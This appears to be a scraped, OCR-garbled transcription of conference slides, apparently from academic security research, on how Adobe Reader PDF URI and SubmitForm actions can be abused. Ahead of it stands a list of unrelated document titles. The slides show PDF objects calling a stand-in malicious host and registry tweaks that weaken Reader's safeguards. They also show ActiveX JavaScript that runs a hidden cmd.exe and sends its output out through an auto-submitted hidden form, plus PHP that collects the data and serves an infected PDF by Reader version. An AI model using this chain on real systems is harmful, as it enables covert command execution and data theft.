Malicious URI resolving in PDFs

Similar documents
ACS Fellows Program Online Nomination System. Step-by-Step Instructions

Data 100. Lecture 9: Scraping Web Technologies. Slides by: Joseph E. Gonzalez, Deb Nolan

Google App Engine 8/10/17. CS Cloud Compu5ng Systems--Summer II 2017

Let the Blogging Begin!

Completing the Florida Legislature Employment Application

IBM Cognos Open Mic Cognos Analytics 11 Part nd June, IBM Corporation

Elizabeth Nichols, Chief Deputy Clerk ext. 133

Class Action Registry. Handbook for lawyers. Direction générale des services de justice. Version 1.00

Analysis of AMS Elections 2010 Voting System

DevOps Course Content

PRINT an answer sheet (page 4).

User Guide. News. Extension Version User Guide Version Magento Editions Compatibility

Cloud Tutorial: AWS IoT. TA for class CSE 521S, Fall, Jan/18/2018 Haoran Li

Policy Governing Lobbying Activities

User Guide. City Officials Historical Database. By Susan J. Burnett

SADA. South African Data Archive. Political Regimes and Regime Transitions in Africa,

Addressing the Challenges of e-voting Through Crypto Design

Installation Guide: cpanel Plugin

Consular department Ministry of Foreign Affairs of the Russian Federation Completion of electronic visa application form

301 Politics and Film RPOL POL30. Master Course Syllabus

State Instructions Online Taxability Matrix and Certificate of Compliance

Paper No Filed: October 7, 2015 UNITED STATES PATENT AND TRADEMARK OFFICE BEFORE THE PATENT TRIAL AND APPEAL BOARD

ITC Web Docket System - Wattyl

Case 1:17-cv Document 1 Filed 10/19/17 Page 1 of 39 : : : : : : : : : : : :

Review: Background on Bits. PFTD: What is Computer Science? Scale and Bits: Binary Digits. BIT: Binary Digit. Understanding scale, what does it mean?

Secure Voter Registration and Eligibility Checking for Nigerian Elections

Voting System Qualification Test Report Democracy Live, LiveBallot Version 1.9.1

Terms of Use When you Access FoodSwitch you agree to these Terms of Use ("Terms"). General Terms and Conditions of Use

BOSCH-ZÜNDER ONLINE: THE NEXT LEVEL OF INTERNAL STORYTELLING ALEXANDER FRITSCH ROBERT BOSCH GMBH INTRA.NET RELOADED BERLIN APRIL 19/20, 2018

PEW RESEARCH CENTER S PROJECT FOR EXCELLENCE IN JOURNALISM IN COLLABORATION WITH THE ECONOMIST GROUP 2011 Tablet News Phone Survey July 15-30, 2011

TOTAL NATIONAL POST NETWORK 12,315,080. Report for September 2012 DIGITAL EDITION (See Notes #1)

Attorneys for Plaintiff GUILLERMO ROBLES UNITED STATES DISTRICT COURT CENTRAL DISTRICT OF CALIFORNIA-WESTERN DIVISION

YOOCHOOSE GmbH Terms and Conditions Subject Matter

Best Prac*ces & Training Guide for Professional Development and Networking - June 2011-

Ruckus SmartZone 100 and Virtual SmartZone Essentials SNMP MIB Reference

BromBone Terms Definitions. Affiliate Customer Customer Data Malicious Code Party Parties Services Sitemap XML Third-Party Applications URL or URLs

Legislative Counsel Bureau Information Technology Services. NELIS Nevada Electronic Legislative Information System

NEW YORK STATE COURTS ELECTRONIC FILING SYSTEM

One View Watchlists Implementation Guide Release 9.2

eacademic Foundations Release 4.12

DALLAS COUNTY PURCHASING DEPARTMENT

City of Toronto Election Services Internet Voting for Persons with Disabilities Demonstration Script December 2013

Case 1:18-cv Document 1 Filed 02/26/18 Page 1 of 21 ECF CASE INTRODUCTION

Case 1:18-cv Document 1 Filed 01/27/18 Page 1 of 23 ECF CASE INTRODUCTION

Document Version 1.7: Revised March 11, 2019 Revision Notes

AVIS RENT A CAR AVIS APPS TERMS OF USE

Fairsail Payflow Cookbook for CSV Record Downloads

Drafting Legislation Using XML in the U.S. House of Representatives

Silver Shadow Voyage #3832 Tokyo to Hong Kong October 29 November 13, 2018

Citizen engagement and compliance with the legal, technical and operational measures in ivoting

Crystal Symphony Far East Overtures Voyage # 7205 Singapore to Hong Kong March 7-20, 2017

FM Legacy Converter User Guide

2017 APCUG Annual Meeting November 4, Benefits / Don Singleton VOTY PUSH / Virtual Technology Committees Judy Taylour, Chair

THE PEOPLE, FOOD, FASHION, ARTS AND NEWS THAT SHAPE LOS ANGELES

IN THE UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF GEORGIA ATLANTA DIVISION

Election Night Results Guide

ForeScout Extended Module for McAfee epolicy Orchestrator

TOTAL NATIONAL POST NETWORK 13,980,756. CONSOLIDATED MEDIA REPORT Newspaper. Report for September 2013

Systems and methods for conducting jury research and training for estimating punitive damages

Question 1. Does your library plan to remain in the Federal Depository Library Program?

Estonian National Electoral Committee. E-Voting System. General Overview

UNITED STATES DISTRICT COURT MIDDLE DISTRICT OF FLORIDA ADMINISTRATIVE PROCEDURES FOR ELECTRONIC FILING IN CIVIL AND CRIMINAL CASES

JUDICIARY OF GUAM ELECTRONIC FILING RULES 1

Prof. Dr. G. Vermeulen Montrasec International Experts Meeting JLS/2007/ISEC/514 - Brussels, 1 October 2009

My Health Online 2017 Website Update Online Appointments User Guide

Privacy Policy. This Privacy Policy sets out the Law Society's policies in relation to the management of Personal Information.

c. References herein to the singular includes the plural and vice versa; and

ISO Stand Alone Remittance Messages. Introduced in April 2014

Google feud unblocked

PERSONAL DATA PROCESSING AGREEMENT

Creating Attractive and Useful SharePoint Pages

FREQUENTLY ASKED QUESTION

DOES ADDITION LEAD TO MULTIPLICATION? Koos Hussem X-CAGO B.V.

SPARC Version New Features

1625 K Street NW Suite 750 Washington DC Tel:

AGENCY: Office of the Deputy Secretary, Department of. ACTION: Notice reopening the Race to the Top District

NATIONAL CITY & REGIONAL MAGAZINE AWARDS

BRAND REPORT FOR THE 6 MONTH PERIOD ENDED JUNE 2018

Consular department Ministry of Foreign Affairs of the Russian Federation Completion of electronic visa application form

Assumption of TOBT Responsibility and Usage Agreement HAM CSA

Voting over the Internet in 2014? Union of British Columbia Municipalities 2012 Annual Convention UBCM 2012 Annual Convention In Conversation

Technology Tuesday Webcast Series: Want To Go Blogging? March 9, 2004 Presenter: Lori Bowen Ayre

Want To Go Blogging? Agenda. Bloggers. Residents of Planet Blogistan or Web + Logs

METASPLOIT CAPTURE THE FLAG CONTEST OFFICIAL RULES

Hoboken Public Schools. PLTW Introduction to Computer Science Curriculum

E-Filing Court Documents In Escambia County

A Step-by-Step Guide to Help You Quickly & Easily Obtain Your Child s Passport (Minor Child Under Age 14)

Cadac SoundGrid I/O. User Guide

DACS Website Licence Terms and Conditions November 2014

The Parties to the contract are komro GmbH (hereinafter referred to as komro ), Am Innreit 2, Rosenheim, and the respective User.

Member Handbook. Version 15 March 24, Yearbook of Experts, Authorities & Spokespersons and

WEBSITE TERMS OF USE AGREEMENT

Inviscid TotalABA Help

Statement on Security & Auditability

DOWNLOAD OR READ : HOW TO OBTAIN YOUR U S IMMIGRATION VISA FOR A TEMPORARY STAY THE NON IMMIGRANT VISA KIT IMMIGRATION MANUAL PDF EBOOK EPUB MOBI

Case 1:17-cv Document 1 Filed 12/05/17 Page 1 of 23 ECF CASE INTRODUCTION

The Issue Of Internet Polling

Mojdeh Nikdel Patty George

Case 1:17-cv Document 1 Filed 11/06/17 Page 1 of 23 ECF CASE INTRODUCTION

This Week on developerworks: Ruby, AIX, collaboration, BPM, Blogger API Episode date:

Transcription:

Malicious URI resolving in PDFs Valen6n HAMON Opera&onal cryptology and virology laboratory (C+V) valen6n.hamon@et.esiea- ouest.fr h<p://cvo- lab.blogspot.fr/

Outline Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Introduc6on (1/2) Ø PDF format : Ø Primarily cons6tuted of objects. Ø These objects can be dynamics: Ø Javascript Ø Forms Ø Digital Media (SWF, ) Ø

Introduc6on (2/2) And we know that Dynamic Objects => Security threats \OpenAc-on

Introduc6on (3/3) Previous works : Eric Filiol, Black Hat EU 2008: PDF Security analysis and malware threats. Raynal, Delugré and Aumaitre, Hack.lu 2009: Malicious Origami in pdf. Didier Stevens, Hack.lu 2009: Penetra&on document format.

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Network security in Adobe Reader URI Method (1/5) RFC 3986 :"a Uniform Resource Iden6fier (URI) is a compact string of characters for iden6fying an abstract or physical resource". A Uniform Resource Locator(URL) is an URI "that iden6fy resources via a representa6on of their primary access mechanism".

Network security in Adobe Reader URI Method (2/5) PDF reference 1.7: a URI ac6on causes a URI to be resolved. Lots of protocols are so supported : - HTTP - FTP - MAILTO -...

Network security in Adobe Reader URI Method (3/5) Code: 4 0 obj << /Type /Ac6on /S /URI(hCp://www.malicioussite.com/upload.php) >> endobj

Network security in Adobe Reader URI Method (4/5) Weblink Plug- in Weblink Driver IAC Default Web browser IAC : Interapplica6on Communica6on Message Request performed

Network security in Adobe Reader URI Method (5/5) GET request performed: Internet Explorer 9 Wireshark Capture of the request launched by the URI Ac-on

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Network security in Adobe Reader Submit Form Method (1/8) PDF reference 1.7: a submit- form ac6on transmits the names and values of selected interac6ve form fields to a specified uniform resource locator (URL).

Network security in Adobe Reader Submit Form Method (2/8) Code : 4 0 obj << /S /SubmitForm /F << /F (hcp://www.malicioussite.com/upload.php) /FS /URL >> >> endobj

Network security in Adobe Reader Submit Form Method (3/8) AcroForms Request performed View results on the default web browser

Network security in Adobe Reader Submit Form Method (4/8) Different file formats can be used for transmilng form data by PDF : - HTML Form format - Forms Data Format (FDF) - XFDF, FDF version based on XML - PDF

Network security in Adobe Reader Submit Form Method (5/8) POST request performed: Wireshark Capture of the request launched by the Submit Form Ac-on

Network security in Adobe Reader Submit Form Method (6/8) The frame contains a FDF File:

Network security in Adobe Reader Submit Form Method (7/8) Note about Javascript: 4 0 obj << /JS( var asubmitfields = new Array( "0" ); this.submitform({ curl: "hcp://www.malicioussite.com/upload.php", afields: asubmitfields, csubmitas: "FDF" });) /S /JavaScript >> endobj

Network security in Adobe Reader Submit Form Method (8/8) But Javascript should be enable in the user configura-on: HKEY_CURRENT_USER\Sosware\Adobe\Acrobat Reader \9.0\JSPrefs => set to 0x00000001

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Network security in Adobe Reader Adobe URL filter (1/7) By default, an alert Box appears:

Network security in Adobe Reader Adobe URL filter (2/7) To allow every websites: HKEY_CURRENT_USER\Sosware\Adobe\Acrobat Reader \9.0\TrustManager\cDefaultLaunchURLPerms => Set value to 0x00000002

Network security in Adobe Reader Adobe URL filter (3/7) There is also a filter for file types (ONLY for Submit Form Method):.HTML,.PDF,.FDF,.PHP,.ASP,.. (Web and Adobe files).exe,.js,.vbs,

Network security in Adobe Reader Adobe URL filter (4/7) But there is no filter for URI Method ( Web browser s job ): ALL (including.exe,.vbs, etc.) NONE ( It may depends on the web browser)

Network security in Adobe Reader Adobe URL filter (5/7) Demo **Opening a PDF can cause the automahc download of a malicious file** => Social engineering

Web browser 1 : Mozilla Firefox

Web browser 2 : MicrosoO Internet Explorer

Web browser 3 : Google Chrome

Network security in Adobe Reader Adobe URL filter (6/7) Disadvantages: - Hard to find a method to automa-cally launch the downloaded file (Ac-veX methods in IE could be used). Advantages : - Executables are well known acacks. PDFs acacks are less known. - It works with every versions of Adobe Reader.

Network security in Adobe Reader Adobe URL filter (7/7) Step 1 Force download Step 3 Launch a small ShellCode by a JS Exploit Step 2 Big malicious executable The ShellCode launch the big executable downloaded

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Weaknesses of Adobe s URL Security Zone Manager (1/5)

Weaknesses of Adobe s URL Security Zone Manager (2/5) With URI Method: The security configurahon of the zone is well applied.

Weaknesses of Adobe s URL Security Zone Manager (3/5) With Submit Form Method: C:\\Users\\CURRENT_USER\\AppData\\Local\\Temp\\AR95F6.htm The web browser only knows this URI!!!

Weaknesses of Adobe s URL Security Zone Manager (4/5)

Weaknesses of Adobe s URL Security Zone Manager (5/5) **The web browser can not know the real URL** **Now, imagine that a URL is normally blacklisted in a web browser. If we use Submit Form, browser filter cannot be applied on the URL.**

Weaknesses of Adobe s URL Security Zone Manager (5/5) With Adobe Reader version > 10: Ø Protected Mode. HKEY_CURRENT_USER\Sosware\Adobe\Acrobat Reader \10.0\Privileged\bProtectedMode

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

An invisible malicious proxy (1/)

An invisible malicious proxy (1/)

An invisible malicious proxy (1/10) Step 1: Opening the PDF launch a HTTP request to the malicious Server Ø /OpenAc-on Ø /SubmitForm Ac-on

An invisible malicious proxy (1/)

An invisible malicious proxy (2/10) Step 2: AcroForms performs the request, the file is downloaded in App Data/ Ø C:\\Users\\CURRENT_USER\\AppData\\Local\\Temp\\AR95F6.htm

An invisible malicious proxy (1/)

An invisible malicious proxy (3/10) Step 3: Malicious ac&ons are done on the vic&m s computer Call a hidden shell: Ø Create a new WScriptShell Ac-veX Object new AcHveXObject('WScript.Shell'); Ø Use Run method to launch the shell wshshell.run('cmd.exe /c dir > C:/Temp/Mylog.txt',0,true);

An invisible malicious proxy (4/10) Step 3: Malicious ac&ons are done on the vic&m s computer Read the file and store in a JavaScript Variable: Ø Create a new ScripHng.FileSystemObject Ac-veX Object new AcHveXObject('ScripHng.FileSystemObject'); Ø Read the file var New = Object2.OpenTextFile("C:/Temp/Mylog.txt",1); var read = New.ReadAll();

An invisible malicious proxy (5/10) Step 3: Malicious ac&ons are done on the vic&m s computer Erase the file on the disk: Ø Create a new ScripHng.FileSystemObject Ac-veX Object new AcHveXObject('ScripHng.FileSystemObject'); Ø Open again the file in «erase» mode var NouvTxt = Object.OpenTextFile("C:/Temp/Mylog.txt",2); NouvTxt.Close();

An invisible malicious proxy (6/10) Step 3: Malicious ac&ons are done on the vic&m s computer Pro/Cons of this acack (Ac-veX): Advantages : - The Shell is hidden. - Results can be sent back to a server. - Don t use AJAX(Asynchronous Javascript and XML) requests. - Disadvantages: - Works only with IE configured as default web browser. - Registry keys needs to be set to use Ac-veX.

NOTE: An invisible malicious proxy (7/10) Step 3: Malicious ac&ons are done on the vic&m s computer ** This is just an example, but all acacks in web browsers can be used as long as files are accepted by AcroForms.**

An invisible malicious proxy (1/)

An invisible malicious proxy (8/10) Step 4: Send back results Send back results to a web server: Ø Create an empty HTML Form <form style="display: none; visibility: hidden" achon="hhp:// www.malicioussite.com" method="post" name="form" enctype="mulhpart/form- data"> <input type=hidden name="file" value=""> </ form> Ø Put the data to send document.getelementbyid ("file").value = read; Ø Auto- submit the form document.form.submit ();

An invisible malicious proxy (1/)

An invisible malicious proxy (9/10) Step 5: Server- side recep&on in PHP Ø Process HTTP POST requests received if (count ($ _POST)> 0) {... } Ø Write results in a file fopen(); fputs(); fclose();

An invisible malicious proxy (10/10) Step 5: Server- side recep&on in PHP Ø Auto- redirec-on to a legi-mate website: <form style="display: none; visibility: hidden" achon="hhp:// www.google.com" method="post" name="form" enctype="mulhpart/form- data"> </ form> <script> document.form.submit(); </script>

An invisible malicious proxy (Demo)

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Scou6ng Adobe Reader (1/4) Ø Request Performed:

Scou6ng Adobe Reader (2/4) Server- side processing in PHP: Ø Read the header $headers = apache_request_headers(); Ø Check for Acrobat- Version informa-on in the header foreach ($headers as $header => $value) { if($header == "Acrobat- Version"){ } } Ø For a version number, launch the malicious PDF related if(preg_match("#9#",$value)){ // if Adobe version == 9.X header('content- type: applicahon/pdf'); header('content- DisposiHon: ahachment; filename="infectedsimple.pdf"'); readfile('infectedsimple.pdf'); }

Scou6ng Adobe Reader (3/4)

Scou6ng Adobe Reader (4/4) In this scenario: we don t need javascript to know the Adobe Version!!!

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Conclusion Ø /OpenAc6on s6ll works. Ø Try new methods to an6cipate future threats. Ø Weak URL Detec6on.

Future Works Ø Compare the security of different PDF Readers. Ø Analyze what is the security of PDFs on Smartphones. Ø Explore other Opera6ng systems (Linux, Mac OSX).

Ø Introduc6on Ø Network security in Adobe Reader Ø URI Method Ø Submit Form Method Ø Adobe URL Filter Ø Weaknesses of Adobe s URL Security Zone Manager Ø A<ack Scenario 1 : an invisible malicious proxy Ø A<ack Scenario 2 : scou6ng Adobe Reader Ø Conclusion Ø Ques6ons

Thank you for your ahenhon. Any queshons??? ValenHn HAMON valen&n.hamon@et.esiea- ouest.fr

2024 © lawsdocbox.com Privacy Policy | Terms of Service | Feedback